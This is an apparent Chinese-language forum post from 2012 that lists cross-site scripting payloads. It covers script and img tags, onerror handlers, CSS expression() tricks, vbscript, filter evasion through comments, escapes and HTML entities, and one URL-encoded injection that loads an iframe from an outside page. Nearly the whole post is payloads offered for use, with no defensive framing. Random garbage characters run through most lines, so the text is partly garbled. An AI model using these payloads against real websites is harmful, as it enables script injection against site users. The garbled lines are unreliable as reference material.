<script>alert("跨站")</script> (最常用)" C; V( ~, O! ]- t
<img scr=javascript:alert("跨站")></img>( A* }4 C6 v$ o* ~4 K2 a
<img scr="javascript: alert(/跨站/)></img>3 L% [0 }& ? a, T1 H0 a6 u
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
- r/ c1 F9 ]* ^ b3 T% j7 G2 i; g<img scr="#" onerror=alert(/跨站/)></img>9 G/ p' G' ^5 a2 t1 U* T
<img scr="#" style="xss:expression(alert(/xss/));"></img>
# u( j5 G. H. B<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
" X0 v) {" T& p% ~/ W& c<img src=vbscript:msgbox ("xss")></img>8 b8 @+ t: K X# a ]
<style> input {left:expression (alert('xss'))}</style>
) z: L7 ?. m/ r<div style={left:expression (alert('xss'))}></div>
6 c! l+ v8 P% g- o7 v3 P<div style={left:exp/* */ression (alert('xss'))}></div>
, L& u6 W' R5 {- N) j& A<div style={left:\0065\0078ression (alert('xss'))}></div>
) N8 H4 e/ k. V2 c$ ]& o1 rhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
) ~( D, T4 l! O, hunicode <div style="{left:expRessioN (alert('xss'))}">! }9 ~# @+ b" I. i" p: N
9 ^2 p' G1 s, C- r/ |
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
& Y; r' v# J" ^- t0 T# N. _# q |
发表于 2012-9-13 17:15:04
收藏
支持
反对